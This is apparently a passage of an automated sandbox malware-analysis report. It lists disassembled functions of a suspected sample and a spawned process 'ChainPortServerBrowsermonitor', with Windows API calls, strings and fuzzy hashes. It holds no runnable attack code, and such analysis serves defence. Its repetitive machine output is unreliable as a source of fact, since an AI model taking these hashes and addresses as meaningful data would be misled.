                                                          • Instruction Fuzzy Hash: AB21A23284024CAEDB21EEA5CD06FEE7BA8AF05704F040526F910961A2F675D658EF52
                                                          APIs
                                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00FBAC5A,00000008,?,00000000,?,00FBD22D,?,00000000), ref: 00FC0E85
                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00FBAC5A,00000008,?,00000000,?,00FBD22D,?,00000000), ref: 00FC0E8F
                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00FBAC5A,00000008,?,00000000,?,00FBD22D,?,00000000), ref: 00FC0E9F
                                                          Strings
                                                          • Thread pool initialization failed., xrefs: 00FC0EB7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                          • String ID: Thread pool initialization failed.
                                                          • API String ID: 3340455307-2182114853
                                                          • Opcode ID: 4dc53451a69f1f60fa6d560f01ee43ee16d9091134f00143cec1abb2b476b0da
                                                          • Instruction ID: e27a248eff48d861244377658cb6b2635a61d1fdb6e7eda9dbb5206e02720f43
                                                          • Opcode Fuzzy Hash: 4dc53451a69f1f60fa6d560f01ee43ee16d9091134f00143cec1abb2b476b0da
                                                          • Instruction Fuzzy Hash: 5611C4B1A4070DDFC3204F669D89EA7FBDCEB54754F10482EF1C6C7200DA715941AB50
                                                          APIs
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • EndDialog.USER32(?,00000001), ref: 00FCB2BE
                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00FCB2D6
                                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 00FCB304
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ItemText$DialogWindow
                                                          • String ID: GETPASSWORD1
                                                          • API String ID: 445417207-3292211884
                                                          • Opcode ID: 8628663ebfda7be0e9f7887da5d28ccd6306ab7c3f08599cf1fc7e66632f0a40
                                                          • Instruction ID: 9378306e6a4ec6a38b29d55cba21e57acfb75a108c262261abfa5ce2aedee1f5
                                                          • Opcode Fuzzy Hash: 8628663ebfda7be0e9f7887da5d28ccd6306ab7c3f08599cf1fc7e66632f0a40
                                                          • Instruction Fuzzy Hash: 6A110836900116B6DB239A64AE4BFFF776CFF19720F000015FA85B60C4C7A99944A761
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                          • API String ID: 0-56093855
                                                          • Opcode ID: 76c495db5b4ced632cbc8ae4b7d0effa3947292c0e76a2d8f374c9a3acd71431
                                                          • Instruction ID: a22552f812379eea6b16062c497bdd2d5b86e3a3aea6e224d1c7daec455d02ac
                                                          • Opcode Fuzzy Hash: 76c495db5b4ced632cbc8ae4b7d0effa3947292c0e76a2d8f374c9a3acd71431
                                                          • Instruction Fuzzy Hash: C3015676D0424AAFDB118F55EE45F6A7BA8FB047A4B00043DF54697121C6329851F7A0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                          • Instruction ID: 6ce28ec284915439c582ff2edcce53c7dfe0e3785f49097b4e1b050b9456eced
                                                          • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                          • Instruction Fuzzy Hash: 09A12772E182869FE721CF98C8917AEBBE6EF51320F1C416FD5859B381C2B88941E750
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00FB7F69,?,?,?), ref: 00FBA3FA
                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00FB7F69,?), ref: 00FBA43E
                                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00FB7F69,?,?,?,?,?,?,?), ref: 00FBA4BF
                                                          • CloseHandle.KERNEL32(?,?,?,00000800,?,00FB7F69,?,?,?,?,?,?,?,?,?,?), ref: 00FBA4C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: File$Create$CloseHandleTime
                                                          • String ID:
                                                          • API String ID: 2287278272-0
                                                          • Opcode ID: a060de686dfbfd446cb466808b61c61fddcc60bad10a868971801be3ec3e5253
                                                          • Instruction ID: 8ee58380d736f1718cfda9a5b6f3af1676f9111f4c899c809695d1a226340f17
                                                          • Opcode Fuzzy Hash: a060de686dfbfd446cb466808b61c61fddcc60bad10a868971801be3ec3e5253
                                                          • Instruction Fuzzy Hash: 1741F131648381AAE731DF25DC4AFEEBBE4AB81314F08091DB5D193191C6A99A4CEF53
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID:
                                                          • API String ID: 176396367-0
                                                          • Opcode ID: b33159f27a34d57082112ee8080aa8efa64bb3d1dae47e168b7629db6d881e90
                                                          • Instruction ID: b73736a7864279a86522729f6a5076d0370bcd04e4a03e165310203417943afe
                                                          • Opcode Fuzzy Hash: b33159f27a34d57082112ee8080aa8efa64bb3d1dae47e168b7629db6d881e90
                                                          • Instruction Fuzzy Hash: CD41D9719006569BCB219F688C1A9DE7BB8EF00320F040019FE45F7245DF34AE599BA5
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00FD91E0,?,00000000,?,00000001,?,?,00000001,00FD91E0,?), ref: 00FDC9D5
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FDCA5E
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00FD6CBE,?), ref: 00FDCA70
                                                          • __freea.LIBCMT ref: 00FDCA79
                                                            • Part of subcall function 00FD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FDCA2C,00000000,?,00FD6CBE,?,00000008,?,00FD91E0,?,?,?), ref: 00FD8E38
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                          • String ID:
                                                          • API String ID: 2652629310-0
                                                          • Opcode ID: 9929fa62a3c231aa3be40bd1dedb11055cb1994884467fe0e6a3e38ade068d84
                                                          • Instruction ID: 70b9808617fec8f0f2468c6656c1a0aee950ade1f9ac0b3815ce7a45fd315072
                                                          • Opcode Fuzzy Hash: 9929fa62a3c231aa3be40bd1dedb11055cb1994884467fe0e6a3e38ade068d84
                                                          • Instruction Fuzzy Hash: E131B57290021AABDF24DF65DC55DBE7BA6EB41320B18426AFC04DB290E739DD50EBD0
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00FCA666
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FCA675
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FCA683
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00FCA691
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 6a1d24509aad134c46a0d4ee8a2eaf2ecbacce874a43a4c2b43b3d3c49fdb820
                                                          • Instruction ID: 3a2ded3fdceb5eaf9c99831c92308ee2219cf7f461de56b98399821d7df0def4
                                                          • Opcode Fuzzy Hash: 6a1d24509aad134c46a0d4ee8a2eaf2ecbacce874a43a4c2b43b3d3c49fdb820
                                                          • Instruction Fuzzy Hash: 73E0EC31942722A7D6725B60BC1EB9A3E98BF05BA2F010101FB45AA184DB6D85019BA1
                                                          APIs
                                                            • Part of subcall function 00FCA699: GetDC.USER32(00000000), ref: 00FCA69D
                                                            • Part of subcall function 00FCA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FCA6A8
                                                            • Part of subcall function 00FCA699: ReleaseDC.USER32(00000000,00000000), ref: 00FCA6B3
                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00FCA83C
                                                            • Part of subcall function 00FCAAC9: GetDC.USER32(00000000), ref: 00FCAAD2
                                                            • Part of subcall function 00FCAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00FCAB01
                                                            • Part of subcall function 00FCAAC9: ReleaseDC.USER32(00000000,?), ref: 00FCAB99
                                                          Strings
                                                          Similarity
                                                          • API ID: ObjectRelease$CapsDevice
                                                          • String ID: (
                                                          • API String ID: 1061551593-3887548279
                                                          • Opcode ID: a58b0cebd0472eda3e22ea1d5aabac12687c6c8dc0371b99126d82567a0174d7
                                                          • Instruction ID: 5491202dec4b93fa291984457435f5d68ffe0d156f990057dd7b806a978f1063
                                                          • Opcode Fuzzy Hash: a58b0cebd0472eda3e22ea1d5aabac12687c6c8dc0371b99126d82567a0174d7
                                                          • Instruction Fuzzy Hash: 2F911271604349AFD620DF25C889E2BBBE8FFC9714F00491EF59AD7260CB35A905DB62
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB75E3
                                                            • Part of subcall function 00FC05DA: _wcslen.LIBCMT ref: 00FC05E0
                                                            • Part of subcall function 00FBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FBA598
                                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FB777F
                                                            • Part of subcall function 00FBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA501
                                                            • Part of subcall function 00FBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FBA325,?,?,?,00FBA175,?,00000001,00000000,?,?), ref: 00FBA532
                                                          Strings
                                                          Similarity
                                                          • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                          • String ID: :
                                                          • API String ID: 3226429890-336475711
                                                          • Opcode ID: f54eb0cf0ed14bd54c700be955c281c561ce8b4674edfcfc633370b77080596d
                                                          • Instruction ID: c25dd41cd64203b83ef277ef46c272e5ded100be90334f4ec64b80a16fa959b7
                                                          • Opcode Fuzzy Hash: f54eb0cf0ed14bd54c700be955c281c561ce8b4674edfcfc633370b77080596d
                                                          • Instruction Fuzzy Hash: 7F418471804258A9EB35FB66CD5AEEEB37DEF81300F004096B605A3092DB785F85EF61
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: }
                                                          • API String ID: 176396367-4239843852
                                                          • Opcode ID: 4e66774427ae02f737441026304d82e235d27df47ea161c84309f7e67ded5ae7
                                                          • Instruction ID: a35a05c1c0cd06e93972085e8c3e1b9e61393826b92332e3d559aac0f0ddbd6c
                                                          • Opcode Fuzzy Hash: 4e66774427ae02f737441026304d82e235d27df47ea161c84309f7e67ded5ae7
                                                          • Instruction Fuzzy Hash: 2021D476D043075AD731EA64DE47F6AB3DCDF90760F08082EF640C3246EB68D948A3A2
                                                          APIs
                                                            • Part of subcall function 00FBF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FBF2E4
                                                            • Part of subcall function 00FBF2C5: GetProcAddress.KERNEL32(00FF81C8,CryptUnprotectMemory), ref: 00FBF2F4
                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00FBF33E), ref: 00FBF3D2
                                                          Strings
                                                          • CryptProtectMemory failed, xrefs: 00FBF389
                                                          • CryptUnprotectMemory failed, xrefs: 00FBF3CA
                                                          Similarity
                                                          • API ID: AddressProc$CurrentProcess
                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                          • API String ID: 2190909847-396321323
                                                          • Opcode ID: ab492d2860d66adb245a1bd8a61a2e63de8e6101cc17b62f2c0e20717c2761ce
                                                          • Instruction ID: dbb920723de96fe397a8d6a1daf0530f51154bd03dc7ffe4ea0ceaadc62bef2c
                                                          • Opcode Fuzzy Hash: ab492d2860d66adb245a1bd8a61a2e63de8e6101cc17b62f2c0e20717c2761ce
                                                          • Instruction Fuzzy Hash: 50112932A01269ABDF115F22DC49AFE3B98FF00770B084125FC415B251DA389D46BF91
                                                          APIs
                                                          • _swprintf.LIBCMT ref: 00FBB9B8
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          Strings
                                                          Similarity
                                                          • API ID: __vswprintf_c_l_swprintf
                                                          • String ID: %c:\
                                                          • API String ID: 1543624204-3142399695
                                                          • Opcode ID: c17c44b3523433037e8d0e6a08137e2ace467b1487dcf783cb46fd3c1fcd92f2
                                                          • Instruction ID: d0d8aff1e75e3007508674f3f243f70a00f6293a5bfdd9615e23d2676d527cec
                                                          • Opcode Fuzzy Hash: c17c44b3523433037e8d0e6a08137e2ace467b1487dcf783cb46fd3c1fcd92f2
                                                          • Instruction Fuzzy Hash: 6E01F963900311659630AB3B8C85DABB7ACDE92770B44441BF544D7182EB78D444E6F1
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00010000,00FC1160,?,00000000,00000000), ref: 00FC1043
                                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 00FC108A
                                                            • Part of subcall function 00FB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB6C54
                                                          Strings
                                                          Similarity
                                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                                          • String ID: CreateThread failed
                                                          • API String ID: 2655393344-3849766595
                                                          • Opcode ID: 2f7674b7009fb6e26c7746db01a63ebbfb8632c6d1dc1a477f8740c5d5048166
                                                          • Instruction ID: 8c3fdfac0ece6b417a7a96228024570ac5d6d851f33878ecc943e408411d2ab3
                                                          • Opcode Fuzzy Hash: 2f7674b7009fb6e26c7746db01a63ebbfb8632c6d1dc1a477f8740c5d5048166
                                                          • Instruction Fuzzy Hash: 24014EB534034E6FD3305F259D46F767358FF41361F10002DF74296281CEA1A885B621
                                                          APIs
                                                            • Part of subcall function 00FBE2E8: _swprintf.LIBCMT ref: 00FBE30E
                                                            • Part of subcall function 00FBE2E8: _strlen.LIBCMT ref: 00FBE32F
                                                            • Part of subcall function 00FBE2E8: SetDlgItemTextW.USER32(?,00FEE274,?), ref: 00FBE38F
                                                            • Part of subcall function 00FBE2E8: GetWindowRect.USER32(?,?), ref: 00FBE3C9
                                                            • Part of subcall function 00FBE2E8: GetClientRect.USER32(?,?), ref: 00FBE3D5
                                                          • GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                          • SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          Strings
                                                          Similarity
                                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                          • String ID: 0
                                                          • API String ID: 2622349952-4108050209
                                                          • Opcode ID: d5a6da28967987688850caa0788306a8e04f85d066d6828358caaec32ad976b5
                                                          • Instruction ID: 723d549b1b023eb2865cc1fb4d2310636608a958a81dcf04170bd76597de99b1
                                                          • Opcode Fuzzy Hash: d5a6da28967987688850caa0788306a8e04f85d066d6828358caaec32ad976b5
                                                          • Instruction Fuzzy Hash: 68F08C3094428CAADF250F62881DBEA3BA8BF42364F488114FD8465991EB7AC990BF10
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00FC1206,?), ref: 00FC0FEA
                                                          • GetLastError.KERNEL32(?), ref: 00FC0FF6
                                                            • Part of subcall function 00FB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB6C54
                                                          Strings
                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00FC0FFF
                                                          Similarity
                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                          • API String ID: 1091760877-2248577382
                                                          • Opcode ID: 0815a1391fa3dbab4bcb2071a8b67ebafd6b39b2f922bfabf54d6c48a53db288
                                                          • Instruction ID: 0782469e1f1f3a22cefc8f774736199e87092c6e47e85cbeccd0b147375c42e5
                                                          • Opcode Fuzzy Hash: 0815a1391fa3dbab4bcb2071a8b67ebafd6b39b2f922bfabf54d6c48a53db288
                                                          • Instruction Fuzzy Hash: 19D02B719041647AC61033265C0EDBE3C059F12332B600718F238A52F6CE2849817A92
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00FBDA55,?), ref: 00FBE2A3
                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00FBDA55,?), ref: 00FBE2B1
                                                          Strings
                                                          Similarity
                                                          • API ID: FindHandleModuleResource
                                                          • String ID: RTL
                                                          • API String ID: 3537982541-834975271
                                                          • Opcode ID: 5b2c0e1c88c9c273025ec73c9dc8b4111ee94cf6d27198a2aef3c44d2ab17c5c
                                                          • Instruction ID: 4b6dee7926a750ec2aa861ae8a7d3a338d03698a5bbe0bfc888d24db43fb499f
                                                          • Opcode Fuzzy Hash: 5b2c0e1c88c9c273025ec73c9dc8b4111ee94cf6d27198a2aef3c44d2ab17c5c
                                                          • Instruction Fuzzy Hash: ACC01231A4079066EA3067766C8DB837A585B00B29F09045DB281EF2D1DAA9C980AAA0

                                                          Execution Graph

                                                          Execution Coverage:7%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 8289 7ffd9bbdbab1 8292 7ffd9bbdbb26 QueryFullProcessImageNameA 8289->8292 8291 7ffd9bbdbc74 8292->8291

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9
                                                          • API String ID: 0-3426396564
                                                          • Opcode ID: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                          • Instruction ID: 840223b5753a9fa8845fab0c5bb790e5b6d3337983659d4cb37708303201099b
                                                          • Opcode Fuzzy Hash: feaa998f5ca3c220e03cd0105a0c752630588e44680650cacc5706f469bfa266
                                                          • Instruction Fuzzy Hash: 45014927719A6A4BD7416A7DFC905D8BB50EA9613679606BBD184C71A2E140144AC3C0

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5Z_H$<N_^
                                                          • API String ID: 0-1760700706
                                                          • Opcode ID: 991253fd245aa9e030e103a7b811dfc5c31966c27481369c46ad1ac5bd4ddd4d
                                                          • Instruction ID: ca0b9ab256de4b72af120e04fdb4dd6d3395dfa04fb7d7bc6aef2ddbb1a61a42
                                                          • Opcode Fuzzy Hash: 991253fd245aa9e030e103a7b811dfc5c31966c27481369c46ad1ac5bd4ddd4d
                                                          • Instruction Fuzzy Hash: B651E471A0DA8D4FE759DF688876BA87BE1FF96700F4501BAD048D72F6DE6828058740

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1719684406.00007FFD9BBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBD0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9bbd0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID: FullImageNameProcessQuery
                                                          • String ID:
                                                          • API String ID: 3578328331-0
                                                          • Opcode ID: 21fe779003593b008ac2cd52b6303e27b948ae3d2f9afaacea75217556a17044
                                                          • Instruction ID: dd2dd3994943b66edfe6a46c927c67595535215eb8f36ff87cf6ea4e2f9051bc
                                                          • Opcode Fuzzy Hash: 21fe779003593b008ac2cd52b6303e27b948ae3d2f9afaacea75217556a17044
                                                          • Instruction Fuzzy Hash: F971C370608A8C8FDB68DF28C8657F937E1FB59315F04427EE84EC7292CB75A9418B81
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 365d0f1f617d2da4a1db72fc1e54c89642e184450283ecbedab52371233cd866
                                                          • Instruction ID: 5683e8967d541d785fb4ace48a93342a7b42f699accf25f73759528248751dba
                                                          • Opcode Fuzzy Hash: 365d0f1f617d2da4a1db72fc1e54c89642e184450283ecbedab52371233cd866
                                                          • Instruction Fuzzy Hash: 20414622F0D6A90EE318F7B860AA6F97B90DF45329B1545FED04ECB1F7DD1868418285
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                          • Instruction ID: 193f701aaf035b037eb645a63aa0e23585a7d68294506c02760aa6a7d98f684a
                                                          • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                          • Instruction Fuzzy Hash: EDC08C309118088FC910E72CC88880072A0FF0D210BC20190E00DCB270F21A9C80C700
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28e149b6eaec8455acf60dd11d1a90677249e3e03ef4fee0938c6a344fd6fcae
                                                          • Instruction ID: 49e5147393687c79fcf6404598def3f0e853a243842911ed0af206aa9ccd5b0a
                                                          • Opcode Fuzzy Hash: 28e149b6eaec8455acf60dd11d1a90677249e3e03ef4fee0938c6a344fd6fcae
                                                          • Instruction Fuzzy Hash: 76B09220D5770F82DB3832B109A24A47460AF46219FD202B4D408402B5E86E52D58252
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.1717619089.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffd9b7e0000_ChainPortServerBrowsermonitor.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
